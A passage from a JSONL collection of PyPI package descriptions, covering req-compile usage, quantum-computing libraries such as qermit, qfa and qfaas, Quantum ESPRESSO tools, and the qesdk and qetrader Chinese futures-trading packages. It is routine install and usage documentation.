requirements.txt\nastroid==2.1.0 #\nfutures==3.2.0 # isort\nisort==4.3.4 #\nlazy-object-proxy==1.3.1 #\nmccabe==0.6.1 #\nsix==1.12.0 # astroid\ntyping==3.6.6 # astroid\nwrapt==1.11.1 # astroidOutput is always emitted to stdout. Possible inputs include:> req-compile\n> req-compile .\n# Compiles the current directory (looks for a setup.py)\n\n> req-compile .[test]\n# Compiles the current directory with the extra \"test\"\n\n> req-compile subdir/project\n# Compiles the project in the subdir/project directory\n\n> req-compile subdir/project2[test,docs]\n# Compiles the project in the subdir/project2 directory with the test and docs extra requirements included\n\n> req-candidates --paths-only | req-compile\n# Search for candidates and compile them piped in via stdin\n\n> echo flask | req-compile\n# Compile the requirement 'flask' using the defaut remote index (PyPI)Specifying source of distributionsQer supports obtaining python distributions from multiple sources, each of which can be specified more than once. The following sources\ncan be specified, resolved in the same order (e.g. source takes precedence over index-url):--solutionLoad a previous solution and use it as a source of distributions. This will allow a full\nrecompilation of a working solution without requiring any other source. If the\nsolution file can\u2019t be found, a warning will be emitted but not cause a failure--sourceUse a local filesystem with source python packages to compile from. This will search the entire\ntree specified at the source directory, until an __init__.py is reached.--remove-sourcecan\nbe supplied to remove results that were obtained from source directories. You may want to do\nthis if compiling for a project and only third party requirements compilation results need to be saved.--find-linksRead a directory to load distributions from. The directory can contain anything\na remote index would, wheels, zips, and source tarballs. This matches pip\u2019s commmand line.--index-urlURL of a remote index to search for packages in. When compiling, it\u2019s necessary to download\na package to determine its requirements.--wheel-dircan be supplied to specify where to save\nthese distributions. Otherwise they will be deleted after compilation is complete.All options can be repeated multiple times, with the resolution order within types matching what\nwas passed on the commandline. However, overall resolution order will always match the order\nof the list above.By default, PyPI (https://pypi.org/) is added as a default source. It can be removed by passing--no-indexon the commandline.Identifying source of constraintsWhy did I just get version 1.11.0 ofsix? Find out by examining the output:six==1.11.0 # astroid, pathlib2, pymodbus (==1.11.0), pytest (>=1.10.0), more_itertools (<2.0.0,>=1.0.0)Hashing input requirementsHash input requirements by allowing Qer to parse, combine, and hash a single list. This will allow\nmultiple input files to be logically combined so irrelevant changes don\u2019t cause recompilations. For example,\naddingtenacityto a nested requirements file whentenacityis already included elsewhere.:> req-hash projectreqs.txt\ndc2f25c1b28226b25961a5320e25c339e630342d0ce700b126a5857eeeb9ba12Constraining outputConstrain production outputs with test requirements using the--constraintsflag. More than one file can be\npassed:> cat requirements.txt\nastroid\n\n> cat test-requirements.txt\npylint<1.6\n\n> req-compile requirements.txt --constraints test-requirements.txt\nastroid==1.4.9 # (via constraints: pylint (<1.5.0,>=1.4.5))\nlazy-object-proxy==1.3.1 # astroid\nsix==1.12.0 # astroid\nwrapt==1.11.1 # astroidNote that astroid is constrained bypylint, even thoughpylintis not included in the output.Advanced FeaturesCompiling a constrained subsetInput can be supplied via stdin as well as via as through files. For example, to supply a full\nsolution through a second compilation in order to obtain a subset of requirements, the\nfollowing cmdline might be used:> req-compile requirements.txt --constraints compiled-requirements.txtor, for example to consider two projects together:> req-compile /some/other/project /myproject | req-compile /myproject --solution -which is equivalent to:> req-compile /myproject --constraints /some/other/projectResolving constraint conflictsConflicts will automatically print the source of each conflicting requirement:> cat projectreqs.txt\nastroid<1.6\npylint>=1.5\n\n> req-compile projectreqs.txt\nNo version of astroid could satisfy the following requirements:\n projectreqs.txt requires astroid<1.6\n pylint 1.9.4 (via projectreqs.txt (>=1.5)) requires astroid<2.0,>=1.6Saving distributionsFiles downloading during the compile process can be saved for later install. This can optimize\nthe execution times of builds when a separate compile step is required:> req-compile projectreqs.txt --wheel-dir .wheeldir > compiledreqs.txt\n> pip install -r compilereqs.txt --find-links .wheeldir --no-indexCookbookSome useful patterns for projects are outlined below.Compile, then installAfter requirements are compiled, the usual next step is to install them\ninto a virtualenv.A script for test might run:> req-compile --extra test --solution compiled-requirements.txt --wheel-dir .wheeldir > compiled-requirements.txt\n> pip-sync compiled-requirement.txt --find-links .wheeldir --no-index\nor\n> pip install -r compiled-requirements.txt --find-links .wheeldir --no-indexThis would produce an environment containing all of the requirements and test requirements for the project\nin the current directory (as defined by a setup.py). This is astableset, in that only changes to\nthe requirements and constraints would produce a new output. To produce a totally fresh compilation,\ndon\u2019t pass in a previous solution.The find-links parameter to the sync or pip install willreusethe wheels already downloaded by Qer during\nthe compilation phase. This will make the installation step entirely offline.When taking this environment to deploy, trim down the set to the install requirements:> req-compile --solution compiled-requirements.txt --no-index > install-requirements.txtinstall-requirements.txt will contain the pinned requirements that should be installed in your\ntarget environment. The reason for this extra step is that you don\u2019t want to distribute\nyour test requirements, and you also want your installed requirements to be the same\nversions that you\u2019ve tested with. In order to get all of your explicitly declared\nrequirements and all of the transitive dependencies, you can use the prior solution to\nextract a subset. Passing the--no-indexmakes it clear that this command will not\nhit the remote index at all (though this would naturally be the case as solution files\ntake precedence over remote indexes in repository search order).Compile for a group of projectsQer can discover requirements that are grouped together on the filesystem. Thereq-candidatescommand will print discovered projects and with the--paths-onlyoptions\nwill dump their paths to stdout. This allows recursive discovery of projects that you\nmay want to compile together.For example, consider a filesystem with this layout:solution\n \\_ utilities\n | \\_ network_helper\n |_ integrations\n | \\_ github\n \\_ frameworks\n |_ neural_net\n \\_ clusterIn each of the leaf nodes, there is a setup.py and full python project. To compile these\ntogether and ensure that their requirements will all install into the same environment:> cd solution\n> req-candidates --paths-only\n/home/user/projects/solution/utilities/network_helper\n/home/user/projects/solution/integrations/github\n/home/user/projects/solution/frameworks/neural_net\n/home/user/projects/solution/frameworks/cluster\n\n> req-candidates --paths-only | req-compile --extra test --solution compiled-requirements.txt --wheel-dir .wheeldir > compiled-requirements.txt\n.. all reqs and all test reqs compiled together..."} +{"package": "qe-rho", "pacakge-description": "qeRhoThe module is to generate a charge density filecharge-density.datfor quantum espresso to read.to installpip install qe_rhoto use# import superposition of atomic density\nfrom qe_rho import SAD\n\n# initialize SAD density\nrho = SAD('tests/pwscf.in')\n\n# save charge-density.dat to folder pwscf.save\nrho.saverhog('pwscf.save')\n\n# output real-space charge density in a 3D numpy array\nrhor = rho.rho_g2r()update log2022-07-16addedmeshplot.pwscfplot, plot SAD and converged charge density and difference between them.TODOHDF5 supportspin support"} +{"package": "qermit", "pacakge-description": "Qermitqermitis a python module for running error-mitigation protocols on quantum processors usingpytket, the Cambridge Quantum python module for interfacing withCQCTKET, a set of quantum programming tools.This repo containts API documentation, a user manual for getting started withqermitand source code.Getting Startedqermitis compatible with thepytket1.0 release and so is available for Python 3.9, 3.10 and 3.11 on Linux, MacOS and Windows.\nTo install, run:pip install qermitAPI documentation can be found atcqcl.github.io/Qermit.To get a more in depth explanation of Qermit and its features including how to construct custom methods see themanualwhich includes examples.BugsPlease file bugs on the Githubissue tracker.How to citeIf you wish to cite Qermit in any academic publications, we generally recommend citing ourbenchmarking paperfor most cases.ContributingPull requests or feature suggestions are very welcome. To make a PR, first fork the repo, make your proposed\nchanges on themainbranch, and open a PR from your fork. If it passes\ntests and is accepted after review, it will be merged in.Code styleFormattingAll code should adhere toflake8formatting, ignoring only E501 and W503Type annotationOn the CI,mypyis used as a static\ntype checker and all submissions must pass its checks. You should therefore runmypylocally on any changed files before submitting a PR.TestsTo run the tests:cdinto thetestsdirectory;ensure you have installedpytest;runpytest.When adding a new feature, please add a test for it. When fixing a bug, please\nadd a test that demonstrates the fix."} +{"package": "qeschema", "pacakge-description": "Theqeschemapackage provides tools for\nconverting XML data produced by the Quantum ESPRESSO suite of codes (ESPRESSO:\nopEn-Source Package for Research in Electronic Structure, Simulation and Optimization).RequirementsPython3.7+xmlschema(Python library for processing XML Schema based documents)InstallationYou can install the library withpipin a Python 3.7+ environment:pip install qeschemaIf you need HDF5 utilities and/or the YAML format, install the extra\nfeatures using the appropriate command from these alternatives:pip install qeschema[HDF5]\npip install qeschema[YAML]\npip install qeschema[HDF5,YAML]UsageDefine you data document using:>>>importqeschema>>>pw_document=qeschema.PwDocument()and then read XML data from a file processed by the corresponding application of\nQuantum ESPRESSO suite:>>>pw_document.read(\"tests/examples/pw/Al001_relax_bfgs.xml\")Loaded data can be decoded to Python data dictionary or written to JSON or YAML formats:>>>xml_data=pw_document.to_dict()>>>json_data=pw_document.to_json()AuthorsDavide BrunatoPietro DelugasGiovanni BorghiAlexandr FonariLicenseThis software is distributed under the terms of the MIT License.\nSee the file \u2018LICENSE\u2019 in the root directory of the present\ndistribution, orhttp://opensource.org/licenses/MIT."} +{"package": "qesdk", "pacakge-description": "Project DescriptionProvide history market quotation of futures and options in Chinese market for inquiry.Output pandas.DataFrame format data which is easy to use.Support three frequency data: 'daily'/'mintue'/'tick'Installationpip install qesdkUpgradepip install -U qesdkQuick StartDaily frequencyfrom qesdk import *\nget_price('ZN2210.SFE','2022-07-11', '2022-07-24','daily')return:open close high low volume money \\\ntime \n2022-07-11 22890.0 22730.0 23095.0 22710.0 6622 7.586028e+08 \n2022-07-12 22875.0 22825.0 23265.0 22570.0 6976 7.926840e+08 \n2022-07-13 22825.0 22015.0 22830.0 21885.0 9616 1.090028e+09 \n2022-07-14 21900.0 21385.0 22035.0 21175.0 17883 1.935010e+09 \n2022-07-15 21400.0 21050.0 21505.0 20980.0 11737 1.242712e+09 \n2022-07-18 21300.0 21780.0 21870.0 21215.0 10991 1.180527e+09 \n2022-07-19 22120.0 22095.0 22230.0 22060.0 9348 1.035372e+09 \n2022-07-20 21750.0 21970.0 22005.0 21600.0 8816 9.613756e+08 \n2022-07-21 22300.0 22000.0 22300.0 21855.0 8543 9.477114e+08 \n2022-07-22 21900.0 21925.0 21965.0 21770.0 13236 1.446647e+09 \n\n position upperlimit lowerlimit presett preclose settle \ntime \n2022-07-11 23345.0 25730.0 20215.0 22975.0 22890.0 22870.0 \n2022-07-12 24395.0 25610.0 20125.0 22870.0 22950.0 22885.0 \n2022-07-13 27160.0 25630.0 20135.0 22885.0 22825.0 22430.0 \n2022-07-14 26170.0 25120.0 19735.0 22430.0 22015.0 21600.0 \n2022-07-15 27301.0 24190.0 19005.0 21600.0 21385.0 21220.0 \n2022-07-18 27857.0 23765.0 18670.0 21220.0 21050.0 21760.0 \n2022-07-19 29230.0 24370.0 19145.0 21760.0 21985.0 21915.0 \n2022-07-20 30704.0 24540.0 19285.0 21915.0 21660.0 21960.0 \n2022-07-21 35460.0 24595.0 19320.0 21960.0 22095.0 22065.0 \n2022-07-22 37524.0 24710.0 19415.0 22065.0 22000.0 21965.0Minute frequencyfrom qesdk import *\nget_price('ZN2210.SFE','2022-07-11', '2022-07-24','minute')return:open close high low volume money\ntime \n2022-07-11 09:01:00 22785.0 22760.0 22785.0 22700.0 163 18534950.0\n2022-07-11 09:02:00 22760.0 22725.0 22760.0 22685.0 195 22134500.0\n2022-07-11 09:03:00 22715.0 22720.0 22725.0 22700.0 39 4427900.0\n2022-07-11 09:04:00 22720.0 22710.0 22720.0 22680.0 63 7152150.0\n2022-07-11 09:05:00 22710.0 22700.0 22725.0 22690.0 47 5335800.0\n... ... ... ... ... ... ...\n2022-07-23 00:56:00 22375.0 22360.0 22375.0 22360.0 13 1453650.0\n2022-07-23 00:57:00 22375.0 22365.0 22375.0 22355.0 29 3242625.0\n2022-07-23 00:58:00 22360.0 22355.0 22365.0 22355.0 25 2794725.0\n2022-07-23 00:59:00 22355.0 22380.0 22385.0 22355.0 13 1454125.0\n2022-07-23 01:00:00 22380.0 22400.0 22400.0 22375.0 69 7723875.0\n\n[4170 rows x 6 columns]Tick frequecyfrom qesdk import *\nget_ticks('ZN2210.SFE','2022-08-21', '2022-08-24',fields=['current', 'position','volume'])return:current position volume\ntime \n2022-08-22 09:00:00.500 24720.0 92068.0 61019\n2022-08-22 09:00:01.000 24725.0 92054.0 61044\n2022-08-22 09:00:01.500 24735.0 92052.0 61063\n2022-08-22 09:00:02.000 24745.0 92071.0 61111\n2022-08-22 09:00:02.500 24745.0 92067.0 61142\n... ... ... ...\n2022-08-23 23:59:54.000 24920.0 97685.0 42997\n2022-08-23 23:59:54.500 24920.0 97685.0 42997\n2022-08-23 23:59:55.500 24920.0 97685.0 42997\n2022-08-23 23:59:59.500 24920.0 97685.0 42997\n2022-08-24 00:00:00.000 24920.0 97685.0 42997\n\n[8314 rows x 3 columns]More detailsThe detail document could be obtained onhttps://quantease.cn/newdoc/qesdk.html"} +{"package": "qe-settings", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qetools", "pacakge-description": "QEToolsIt is a command line helper to run comman quantum espresso calculations.Usage:qetools -c [CALCULATION] [OTHER ARGS]Info:By default PBE, PBESOL and LDA (all ONCV) pseudo-potentials are downloaded.Arguments:-c [CALCULATION]encut, kgrid, vacuum- respective convergences.vc-relax- variable cell relaxation.pressure- to get structure at required (compressed) pressure.- *-rp* required pressure in kbars.\n\n- *-ic* intial compression factor (default 0.9).eos- fits equation of state using ASE.- *-ns* number of structures to consider for fitting (default 10).harmonic- energy vs. displacement plot for selected atoms in selected directions.- *-aid* index of atom(s) to displace, by default all unique atoms will be displaced.\n\n- *-dd* direction of displacement, default ( -dd 0 1 2 ).scf- single point energy calculation (All the below calculations require completed 'scf' calculation).nscf- to be done after 'scf' calculation, with finer grid.bands- electronic band structure calculation, by default ase.dft.bandpath will be used, saves plot.dos- electronic dos calculation, saves plot.ph_pre- setting up phonon calculation (must).ph_mid- creates a script which can be run on multiple jobs for ph.x calcuations.ph_post- after ph_mid or ph_pre, completes phonon calculation, returns flfrc file.ph_bands- phonon bandstructure.ph_dos- phonon density of states.epw_pre- setting up for EPW calculation (to be done after 'scf', 'ph_post').epw_post- Performs EPW calculation.Others-e [ENCUT][Ry](default 50).-k [KGRID](default 4 4 4).-v [VACUUM][ANG](default 10)\n*-vdrvacuum direction 1,2,3 for x,y,z direction (must for vacuum calcs)-t [THRESHOLD](default 0.01)-ppn [NODES](default available/2)-ppd [PSEUDOPOTENTIAL DIRECTORY]lda, pbe, pbesol can be used to use default potentials. Otherwise expects path where PPs are present in the format 'Cu.UPF' (default pbe).-fASE readable structure file.-emin, -emaxy-axis limits for electronic bandstructure plot.-asracoustic sum rule for ph_post, (default simple).-nqnumber of q(k) points in bandstructures.-bpbandpath for bandstructures like 'GXLMK', default from ase.bandpath.-npoolnpool for epw related calcs.-parparameters file in the following format (for pw.x, ph.x, dos.x, epw.x)ecutwfc 80\ncalculation scf\n...Example: qetools -c scf -e 80 -k 4 4 4 -f si.cif -ppd lda -ppn 8 -par parameters.txt"} +{"package": "qe-tools", "pacakge-description": "qe-toolsThis repository contains a set of useful tools for Quantum ESPRESSO, in particulara parser for pw.x input filesa parser for cp.x input filesThe code is developed and maintained by the AiiDA Team and is licensed under the MIT license (see LICENSE file)."} +{"package": "qetrader", "pacakge-description": "qetrader\u4ea4\u6613\u63a5\u53e3\u7b80\u4ecbqetrader\u4ea4\u6613\u63a5\u53e3\u53ef\u4ee5\u901a\u8fc7pip\u76f4\u63a5\u5b89\u88c5\u5728\u7528\u6237\u672c\u5730\uff0c\u5b9e\u73b0\u5728\u4efb\u610fpython\u73af\u5883\u4e0b\u8fdb\u884c\u7b56\u7565\u5f00\u53d1\u3001\u56de\u6d4b\u3001\u6a21\u62df\u4ea4\u6613\u548c\u5b9e\u76d8\u4ea4\u6613\u3002\u5b89\u88c5\u8bf4\u660e\u9996\u5148\uff0c\u60a8\u7684\u7cfb\u7edf\u4e0a\u5fc5\u987b\u5df2\u7ecf\u5b89\u88c5\u4e86python\u73af\u5883\uff08\u7248\u672c3.7\u6216\u4ee5\u4e0a\uff09\uff0c\u63a8\u8350\u4f7f\u7528anaconda3. \u7136\u540e\uff0c\u5c31\u53ef\u4ee5\u6309\u7167\u5982\u4e0b\u6b65\u9aa4\u5b89\u88c5\u4e86\u3002windows\u73af\u5883\u5b89\u88c5Microsoft C++ Build Tools\u4e0b\u8f7d\u94fe\u63a5\uff1a\u6ce8\uff1a\u8be5\u5de5\u5177\u7248\u672c\u53f7\u9700\u8981\u572814\u4ee5\u4e0a\u5b89\u88c5Redis-server\u6570\u636e\u5e93\u670d\u52a1\u5bbd\u6613\u63d0\u4f9b\u4e86\u5c0f\u5de5\u5177InstallRedis.exe\u65b9\u4fbf\u5b89\u88c5\u914d\u5957\u7684redis-server\u670d\u52a1\u3002\u4e0b\u8f7d\u94fe\u63a5\uff1a\u4e0b\u8f7d\u540e\u8fd0\u884c\u8be5\u5de5\u5177\u5373\u53efqetrader\u4f7f\u7528\u7684Redis\u7aef\u53e3\u53f7\u662f6379\u3002\u82e5\u9700\u8981\u4fee\u6539\u4e3a\u5176\u4ed6\u7aef\u53e3\u53f7\uff0c\u9700\u8981\u5728qetrader\u5b89\u88c5\u5b8c\u6bd5\u540e\u4fee\u6539qetrader\u7684\u914d\u7f6e\u5b89\u88c5qetraderpipinstall-Uqetrader--timeout=60\u6ce8\uff1a \u82e5\u8981\u52a0\u5feb\u5b89\u88c5\u901f\u5ea6\uff0c\u53ef\u4ee5\u4f7f\u7528\u56fd\u5185\u955c\u50cf\u7ad9\u70b9linux\u73af\u5883\u914d\u7f6e\u5b89\u88c5Redislinux\u4e0b\u5b89\u88c5Redis\u6700\u7b80\u5355\u5feb\u6377\u7684\u65b9\u5f0f\u662f\u4f7f\u7528Docker\u5b89\u88c5\u9996\u5148\u7528docker pull \u4e0b\u8f7dredis\u6700\u65b0\u7248\u672csudo docker pull redis\u7136\u540e\u542f\u52a8redis\u5bb9\u5668sudo docker run -itd --name redis-server -p 6379:6379 redis\u5b89\u88c5qetraderpipinstall-Uqetrader--timeout=60\u6ce8\uff1a \u82e5\u8981\u52a0\u5feb\u5b89\u88c5\u901f\u5ea6\uff0c\u53ef\u4ee5\u4f7f\u7528\u56fd\u5185\u955c\u50cf\u7ad9\u70b9\u4f7f\u7528\u8bf4\u660e\u542f\u52a8\u7f51\u9875\u670d\u52a1\u5199\u4e00\u4e2apython\u6587\u4ef6\u547d\u540d\u4e3arunWeb.pyfromqetrader.qewebimportrunWebpagerunWebpage()\u5728Anaconda\u7684\u547d\u4ee4\u884c\u73af\u5883\u4e0b\u8fdb\u5165runWeb.py\u6240\u5728\u76ee\u5f55\uff0c\u5e76\u8fd0\u884c\u5982\u4e0b\u547d\u4ee4pythonrunWeb.py\u8fd0\u884c\u540eweb\u7f51\u9875\u670d\u52a1\u5c06\u542f\u52a8\uff0c\u7528\u6237\u53ef\u4ee5\u5b9e\u65f6\u67e5\u770b\u8ba2\u5355\u59d4\u6258\uff0c\u6210\u4ea4\uff0c\u6301\u4ed3\uff0c\u6743\u76ca\u548c\u65e5\u5fd7\u4fe1\u606f\uff0c\u5e76\u53ef\u4ee5\u89c2\u5bdf\u884c\u60c5\u56fe\u3002\u6309\u952eCtrl+C\u6216\u8005\u5173\u95ed\u7a97\u53e3\u53ef\u4ee5\u7ec8\u6b62\u8be5\u670d\u52a1\uff0c\u7f51\u9875\u5c06\u65e0\u6cd5\u67e5\u770b\uff0c\u91cd\u65b0\u8fd0\u884c\u4e0a\u8ff0\u547d\u4ee4\u540e\u53ef\u6062\u590d\u3002\u7f16\u5199\u7b56\u7565\u6587\u4ef6\u5e76\u8fd0\u884c\u5982\u4e0b\u662f\u4e00\u4e2apython\u7b56\u7565\u6587\u4ef6\u8303\u4f8bimportqesdkfromdatetimeimportdatetime,timedeltafromqetraderimport*qesdk.auth('Your username','Your authcode')user_setting={'investorid':'000000','password':'XXXXXXXXXXXXXX','broker':'simnow'}user='myname'defgetLastToken(user):acclist=listSimuAccounts(user)iflen(acclist)>0:returnacclist[-1]else:returncreateSimuAccount(user,initCap=10000000)classmystrat(qeStratBase):def__init__(self):self.instid=['AG2306.SFE']self.datamode='minute'self.freq=1defcrossDay(self,context):passdefonBar(self,context):print(get_bar(context,1))defhandleData(self,context):passif__name__=='__main__':strat1=mystrat()token_code=getLastToken(user)runStrat(user,'real',[strat1],simu_token=token_code,real_account=user_setting)\u6ce8\uff1a1.auth\u8bed\u53e5\u4e2d\u6388\u6743\u7801\u9700\u8981\u5728https://quantease.cn\u4e0a\u6ce8\u518c\u767b\u5f55\u540e\u70b9\u51fb\u4e3b\u9875\u53f3\u4e0a\u89d2\u83dc\u5355'\u6388\u6743\u7801'\u83b7\u53d6\u30022.user_setting\u4e2d\u8d26\u6237\u4fe1\u606f\u9700\u8981\u6362\u6210\u60a8\u81ea\u5df1\u7684\u8d26\u6237\u4fe1\u606f3.\u8fd0\u884c\u540e\u590d\u5236\u7ed9\u51fa\u7684\u7f51\u9875\u94fe\u63a5\u5728\u6d4f\u89c8\u5668\u4e2d\u67e5\u770b\u8fd0\u884c\u7ed3\u679c\u5373\u53ef\u4fee\u6539\u7cfb\u7edf\u914d\u7f6e\u83b7\u53d6\u7cfb\u7edf\u914d\u7f6efromqetraderimportread_sysconfigread_sysconfig()\u83b7\u53d6\u7ed3\u679c\u4e3a{'redis': {'host': '127.0.0.1', 'port': 6379, 'password': ''}, 'webpage': {'host': '127.0.0.1', 'port': 5814}}\u4fee\u6539Redis\u914d\u7f6e\u63a5\u53e3\u51fd\u6570\u4e3asetRedisConfig(host='127.0.0.1',port=6379,password='')\u6839\u636e\u60a8\u672c\u5730Redis-server\u914d\u7f6e\u4fee\u6539\u8be5\u63a5\u53e3\uff0c\u4f7f\u5f97qetrader\u53ef\u4ee5\u8bbf\u95ee\u60a8\u7684\u672c\u5730\u6570\u636e\u5e93\u3002\u6bd4\u5982\u60a8\u672c\u5730Redis\u7aef\u53e3\u53f7\u4e3a6380\uff0c \u90a3\u4e48\u53ef\u4ee5\u8fd9\u4e48\u8fd0\u884cfromqetraderimportsetRedisConfigsetRedisConfig(port=6380)\u6062\u590d\u9ed8\u8ba4\u51fa\u5382\u8bbe\u7f6e\u4ec5\u9700\u8981\u8c03\u7528\u4e0d\u5e26\u53c2\u6570\u7684setRedisConfig\u5373\u53effromqetraderimportsetRedisConfigsetRedisConfig()\u4fee\u6539\u7f51\u9875\u914d\u7f6e\u63a5\u53e3\u51fd\u6570\u4e3asetWebConfig(host='127.0.0.1',port=5814)\u5982\u679cqetrader\u7f51\u9875\u670d\u52a1\u9ed8\u8ba4\u7aef\u53e3\u53f75814\u548c\u60a8\u672c\u5730\u7aef\u53e3\u51b2\u7a81\uff0c\u60a8\u53ef\u4ee5\u4fee\u6539\u4e3a\u5176\u4ed6\u7aef\u53e3\u53f7\uff0c\u6bd4\u5982\u4fee\u6539\u4e3a5008\u3002fromqetraderimportsetWebConfigsetWebConfig(port=5008)\u6062\u590d\u9ed8\u8ba4\u51fa\u5382\u8bbe\u7f6e\u4ec5\u9700\u8981\u8c03\u7528\u4e0d\u5e26\u53c2\u6570\u7684setWebConfig\u5373\u53effrom qetrader import setWebConfig\nsetWebConfig()\u5728\u6d4f\u89c8\u5668\u6d4b\u8bd5\u4e00\u4e0b\u8f93\u5165\u7f51\u5740http://127.0.0.1:5814, \u51fa\u73b0\u5982\u4e0b\u6587\u5b57\u4ee3\u8868\u542f\u52a8\u6210\u529fqetrader\u7f51\u9875\u5c55\u793a\u670d\u52a1\u5df2\u7ecf\u6210\u529f\u542f\u52a8\u5982\u4f55\u7f16\u5199\u7b56\u7565\u200b\t\u8bf7\u53c2\u7167\u5b98\u65b9\u6587\u6863\u6587\u6863\u8bf4\u660e\u63d2\u4ef6\u4f7f\u7528\u8bf4\u660e\u5b89\u88c5\u4ee5\u201calgoex\u201c\u63d2\u4ef6\u4e3a\u4f8b\uff0c\u4e0b\u8f7d\u63d2\u4ef6\u4ee3\u7801\u5982\u4e0b\uff1afromqesdkimportauthauth('your username','your authcode')fromqetrader.qepluginsimportinstallPlugininstallPlugin('algoex')\u8fd0\u884c\u4ee3\u7801\u540e\uff0c\u51fa\u73b0\u5982\u4e0b\u63d0\u793a\u4ee3\u8868\u5b89\u88c5\u6210\u529f\uff1a\u63d2\u4ef6algoex\u4e0b\u8f7d\u6210\u529f\n\u5728\u7b56\u7565\u6587\u4ef6\u4e2d\u6309\u5982\u4e0b\u683c\u5f0fimport\u8be5\u63d2\u4ef6:\nfrom qetrader.plugins.qealgoex import plugin_algoex\u6ce8;\u4e0b\u8f7d\u63d2\u4ef6\u9700\u8981\u6210\u4e3aVIP\u4ed8\u8d39\u5ba2\u6237\uff0c\u5426\u5219\u4f1a\u4e0b\u8f7d\u5931\u8d25\u3002\u6ce8\u518cVIP\u8bf7\u8054\u7cfb\u5ba2\u6237\u5f15\u7528\u63d2\u4ef6\u4ee5'algoex'\u4e3a\u4f8b\uff0c\u6839\u636e\u6309\u7167\u7684\u8bf4\u660e\uff0c\u5728code\u4e2d\u4f7f\u7528\uff1afromqesdkimportauth##\u6388\u6743\u7801auth('your username','your authcode')fromqetraderimportlistSimuAccounts,createSimuAccount,runStratfromqetrader.plugins.qealgoeximportplugin_algoex##\u5b9e\u76d8\u8d26\u6237\u4fe1\u606fuser_setting={'investorid':'xxxxxx','password':'xxxxxxxx','broker':'xxxxxx'}if__name__=='__main__':##\u6362\u6210\u81ea\u5df1\u7684\u7528\u6237\u540duser='myname'##\u5982\u679c\u6709\u6a21\u62df\u8d26\u6237\uff0c\u7528\u7b2c\u4e00\u4e2a\u8d26\u6237\uff0c\u6ca1\u6709\u65b0\u5efa\u4e00\u4e2atokenlist=listSimuAccounts(user)iflen(tokenlist)>0:token=tokenlist[0]else:token=createSimuAccount(user)##\u8fd0\u884c\u7b56\u7565\uff0calgoex\u63d2\u4ef6\u672c\u8eab\u5c31\u662f\u4e2a\u7b56\u7565\u5b9e\u4f8b\uff0c\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528runStrat(user,'real',[plugin_algoex],simu_token=token,real_account=user_setting)"} +{"package": "qet-tb-generator", "pacakge-description": "Allows to generate terminal blocks and connectors for QElectroTech electrical diagram software."} +{"package": "qeutil", "pacakge-description": "UNKNOWN"} +{"package": "qeventlog", "pacakge-description": "QEventLogcfgtool qeventlog write -f\narchitect partition \u2013module qeventlog.models"} +{"package": "qexpy", "pacakge-description": "QExPy (Queen\u2019s Experimental Physics) is a Python 3 package designed to facilitate data analysis in undergraduate physics laboratories. The package contains a module to easily propagate errors in uncertainty calculations, and a module that provides an intuitive interface to plot and fit data. The package is designed to be efficient, correct, and to allow for a pedagogic introduction to error analysis. The package is extensively tested in the Jupyter Notebook environment to allow high quality reports to be generated directly from a browser."} +{"package": "qextract", "pacakge-description": "UNKNOWN"} +{"package": "qfa", "pacakge-description": "Quantum Finite AutomataThis library provides implementations of multiple quantum finite automata\nmodels.Implemented automata modelsPFA- Probabilistic Finite AutomatonMO1QFA- Measure-Once Quantum Finite AutomatonMM1QFA- Measure-Many Quantum Finite AutomatonGQFA- General Quantum Finite AutomatonHelper modulesLanguageChecker- used to check a language against an automaton using\nmultiple acceptance conditionsLanguageGenerator- generates language samples from regular expressionsPlotter- plots the results obtained from running a LanguageCheckerHereis the modules' overview in polish.CitationIf you have used our library and and would like to cite its usage, we please use the following BibTeX entry. Thanks!@article{lippa2020simulations,\n title={Simulations of Quantum Finite Automata.},\n author={Lippa, G and Makie{\\l}a, K and Kuta, M},\n journal={Computational Science--ICCS 2020},\n volume={12142},\n pages={441--450},\n year={2020}\n}"} +{"package": "qfaas", "pacakge-description": "qfaas-libqfaas-lib is a supporting library for QFaaS Serverless framework for Quantum Computing.InstallationInstall qfaas-lib with pip (Python >=3.10)pipinstallqfaasUsage/ExamplesfromqfaasimportBackend,RequestData,Utils#Definesdknamesdk=\"braket\"#Pre-processinginputdatadefpre_process(input):data=RequestData(input,sdk)returndata#Post-processingoutputdatadefpost_process(job):output=Utils.counts_post_process(job)returnoutputdefhandle(event,context):#1.Pre-processingrequestData=pre_process(event)#2.GenerateQuantumCircuitqc=generate_circuit(requestData.input)#3.VerifyandgetBackendinformationbackend=Backend(requestData,qc)#4.Submitjobandwaitupto1minforjobtocomplete.job=backend.submit_job(qc)#5.Post-processifjob.jobResult:job=post_process(job)response=Utils.generate_response(job)#6.SendbacktheresultreturnresponseAuthorsHoa NguyenDocumentationTBA"} +{"package": "qface", "pacakge-description": "Qt Interface Builder (QFace)QFace is a generator framework based on a common modern IDL. It is not a generator as such but enforces a common IDL format and provides a library to write your own generator. It is actually very easy to create your own generator and generate your custom solution based on your needs from the same IDL.The IDL is designed after the Qt/QML interface and as such is optimized to generate source code used with Qt C++ or Qt QML, but it is not limited to this use case.QFace is already very fast by design and suitable for large IDL document sets. Additionally it can use a cache to avoid parsing unchanged IDL documents. It can automatically avoid writing new files if the target file has the same content.QFace is written out of the learnings of using IDLs in other large projects. Often in the project you need to adjust the code generation but in many generators this is awfully complicated. Or you need to run a report on the documents or generate specific documentation. In QFace this is enabled by having a very flexible code generation framework which enforces the same IDL.Please see the INSTALL and USAGE guides for more information.DocumentationDocumentation is hosted atreadthedocs.InstallTo install the qface library you need to have python3 and pip installed.pip3installqfaceInstall Development VersionPrerequisitesTo install the development version you need to clone the repository and ensure you have checkout the develop branch.gitclonegit@github.com:Pelagicore/qface.gitcdqface\ngitcheckoutdevelopThe installation requires the python package manager called (pip) using the python 3 version. You can try:python3--version\npip3--versionInstallationUse the editable option of pip to install an editable version.cdqface\npip3install--editable.This reads thesetup.pydocument and installs the package as reference to this repository. So all changes will be immediatly reflected in the installation.To update the installation just simple pull from the git repository.DownloadIf you are looking for the examples and the builtin generators you need to download the code.gitclonegit@github.com:Pelagicore/qface.gitCopyright and licenseCopyright (C) 2016 Pelagicore AGThe source code in this repository is subject to the terms of the MIT license, please see included \"LICENSE\" file for details.QFace Example// echo.qfacemoduleorg.example1.0;/**!The echo interface to call someoneon the other side*/interfaceEcho{readonlyMessagelastMessage;voidecho(Messagemessage);signalcallMe();};structMessage{stringtext;};Now you write a small script using qface to generate your code# mygenerator.pyfromqface.generatorimportFileSystem,Generator# load the interface 